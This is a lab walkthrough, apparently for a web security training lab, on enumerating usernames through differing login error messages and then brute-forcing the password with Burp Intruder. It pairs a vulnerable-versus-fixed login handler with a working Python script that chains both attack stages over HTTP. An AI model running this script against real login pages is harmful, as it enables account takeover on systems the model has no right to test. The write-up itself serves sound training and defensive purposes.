
# Username enumeration via different responses

The target site has an account with a predictable username and password, which can be found in the following wordlists:

{% file src="/files/i6sHt53O6AovpOQzHtgA" %}

{% file src="/files/XFcrGLauFqq1PWEPhOGc" %}

To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

## Enumeration

`Home Page`

![](/files/pOLdpydLIc6u2eDxcNRG)

`Login Page`

![Login Form](/files/P2XFFhCc2WmlvBOkGR59)

![Login Form](/files/utlaoFZ33MfdUPACMHXY)

![Error Message](/files/Y6Fr5kzVBo1avdOrpPSA)

Submitting invalid credentials returns a detailed error message that tells us which part of the credentials was wrong. That difference in responses is the oracle this lab is built around: it lets an attacker confirm valid usernames before ever guessing a password.
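The root cause and its fix side by side, as an added example rather than the lab's own code: `login_vulnerable` mirrors the behaviour observed above (a different message for an unknown user and for a wrong password), while `login_fixed` returns the same status and body for both failures. The user store, the PBKDF2 parameters and the dummy hash for unknown users are assumptions made for the example; the dummy hash keeps the work done on the unknown-user path the same as on the known-user path, so the fix does not trade a message oracle for a timing one.

```python
import hashlib
import hmac
import os
import secrets

# Constructed user store for the example (not the lab's): salted PBKDF2-HMAC-SHA256 hashes.
def _hash_password(password, salt, iterations=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

_SALT = os.urandom(16)
USERS = {"application": (_SALT, _hash_password("soccer", _SALT))}

# Hash verified when the username is unknown, so that path costs the same as a real check.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password(secrets.token_urlsafe(16), _DUMMY_SALT)


def login_vulnerable(username, password):
    """Behaves like the lab: the error message reveals whether the username exists."""
    if username not in USERS:
        return 200, "Invalid username"
    salt, stored = USERS[username]
    if not hmac.compare_digest(_hash_password(password, salt), stored):
        return 200, "Incorrect password"
    return 302, "/my-account"


GENERIC_ERROR = "Invalid username or password"


def login_fixed(username, password):
    """Same status and same body for both failure cases; responses no longer tell them apart."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_hash_password(password, salt), stored)
    if username in USERS and ok:
        return 302, "/my-account"
    return 200, GENERIC_ERROR


def failure_responses(login, usernames, password="definitely-wrong"):
    """Distinct responses for a batch of failed logins.
    More than one distinct response means the handler is an enumeration oracle."""
    return {login(u, password) for u in usernames}


if __name__ == "__main__":
    probe = ["nobody", "application"]
    print("vulnerable:", failure_responses(login_vulnerable, probe))
    print("fixed:     ", failure_responses(login_fixed, probe))
```

`failure_responses` is the check to run against any login handler you own: feed it a mix of real and made-up usernames with a wrong password and it must come back with exactly one distinct response.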

## Exploitation

### Username Enumeration

Set up Burp Suite to intercept requests.

![](/files/yFruJgBockhJmVl8jCgc)

Make a login request with random credentials and intercept it with Burp.

![](/files/5MDxLIf181YfKi06p9WU)

In the response to that request, we can see that the site returns `Invalid username`.

![](/files/KpWv2vr9RvOjoA9dyQZI)

![](/files/BFYOQWAWEQCvG5IHsbuM)

Right-click the `POST` request and send it to Intruder.

![](/files/ia3ZCX2HBVVr5lLJ7NDM)

Head over to the Intruder tab and clear all payload positions.

![](/files/nAwJRLkRqVaJsD2q74Lz)

![](/files/XjeiTgjYGGkbtbiFctNx)

Mark only the value of the `username` parameter as a payload position.

![](/files/ifFc3HeyW9uJqKqIh7ok)

![](/files/U27td40LAM35nUpPgvmd)

Head over to the Payloads tab under Intruder, make sure the following options are set, and paste the username wordlist.

```
Payload set: 1
Payload type: Simple list
```

![](/files/plDgGy2iuP5YD44j0ujK)

Once done, click Start attack. (Burp Suite Community Edition shows a warning that Intruder is throttled; dismiss it, the attack still runs, just more slowly.)

![](/files/E6SrVqlrKxbKUJLdL8OJ)

![](/files/TSPW4mwW5Cyr2N0bbvZ4)

Once the attack has completed, sort the results by the Length column. One request should stand out with a longer response than the rest, as shown below. The length differs because the error message in the body changed, which is exactly the oracle this lab is about.

![](/files/JzM5ZMIZ3xSEN9D0bCag)

Inspecting that request's response shows a different error message. This confirms that `application` is a valid username.

```
Incorrect password
```

![](/files/pE4LdvbXnFxeqF9J1Gip)

### Password Brute-Force

Now repeat the process, but this time target the `password` field with the password wordlist while keeping the username fixed to `application`.

Right-click the `POST` request and send it to Intruder.

![](/files/6rBMA3f7ptKSfeH3fEBk)

Set up the payload positions as shown, marking only the value of the `password` parameter.

![](/files/QEMZGNXD0YpGz2EzYpVE)

Paste the password wordlist in place of the username list.

![](/files/GNOEcbefzhCPkJ2uiWed)

Start the attack

![](/files/Td94ECYgoZ9bXawrX9Ha)

Once the attack has completed, sort the results by Length again. One request should stand out from the rest, as shown below. Its `302` status code indicates a redirect, and the `Location` header in the response points to the account page, which confirms that we have the right password (`soccer`).

![](/files/Kz7Dji8VDS9E0xfY885G)

Logging in with the recovered credentials completes the lab.

```
application:soccer
```
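The same two-stage attack, scripted instead of driven through Intruder. This is an added example, not part of the original walkthrough: `fake_login` is a constructed stand-in for the lab's `/login` endpoint that reproduces the three behaviours observed above so the script runs offline, and `http_login` builds a sender for a real endpoint, assuming a form POST with `username` and `password` fields as the lab uses. The enumeration step compares each response against a known-invalid baseline (a random username) rather than against the majority, so it still works when the wordlist happens to contain several valid accounts.

```python
import secrets
import urllib.error
import urllib.parse
import urllib.request
from collections import namedtuple

Response = namedtuple("Response", "status location body")

# Constructed stand-in for the lab's login endpoint (not the real server). It reproduces
# the three behaviours the walkthrough observed so that the script can run offline.
_FAKE_ACCOUNTS = {"application": "soccer"}


def fake_login(username, password):
    if username not in _FAKE_ACCOUNTS:
        return Response(200, None, "<p class=is-warning>Invalid username</p>")
    if _FAKE_ACCOUNTS[username] != password:
        return Response(200, None, "<p class=is-warning>Incorrect password</p>")
    return Response(302, "/my-account", "")


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError for a 3xx instead of following it,
    # so the 302 and its Location header can be inspected.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_login(url):
    """Sender for a real endpoint; assumes the lab's form fields `username` and `password`."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(username, password):
        data = urllib.parse.urlencode({"username": username, "password": password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with opener.open(req, timeout=10) as resp:
                return Response(resp.status, resp.headers.get("Location"),
                                resp.read().decode(errors="replace"))
        except urllib.error.HTTPError as err:
            return Response(err.code, err.headers.get("Location"),
                            err.read().decode(errors="replace"))
    return send


def signature(resp):
    # What Intruder's Length column approximates: status, redirect target and body size.
    return (resp.status, resp.location, len(resp.body))


def enumerate_usernames(send, usernames, password="x"):
    """Return every username whose response differs from a known-invalid baseline."""
    baseline = signature(send("nouser-" + secrets.token_hex(8), password))
    return [u for u in usernames if signature(send(u, password)) != baseline]


def brute_force_password(send, username, passwords):
    """Return the first password that produces a redirect, the lab's success signal."""
    for pw in passwords:
        resp = send(username, pw)
        if 300 <= resp.status < 400 and resp.location:
            return pw
    return None


def attack(send, usernames, passwords):
    """Chain both stages; returns the (username, password) pairs found."""
    found = []
    for user in enumerate_usernames(send, usernames):
        pw = brute_force_password(send, user, passwords)
        if pw is not None:
            found.append((user, pw))
    return found


if __name__ == "__main__":
    # Constructed mini wordlists standing in for the lab's lists.
    users = ["admin", "root", "application", "guest"]
    passwords = ["123456", "password", "soccer", "qwerty"]
    print(attack(fake_login, users, passwords))
    # Against the real lab, swap the sender:
    # attack(http_login("https://YOUR-LAB-ID.web-security-academy.net/login"), users, passwords)
```

If a target's form carries a CSRF token or a session cookie, `send` has to fetch and replay them before each attempt; and if the page body contains variable-length dynamic content, compare an extracted error message rather than the raw body length.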

![](/files/DyXPeQHiBWh45wN38gvO)

![](/files/GgVZN47L7Cmb3vMTwG2h)

✅


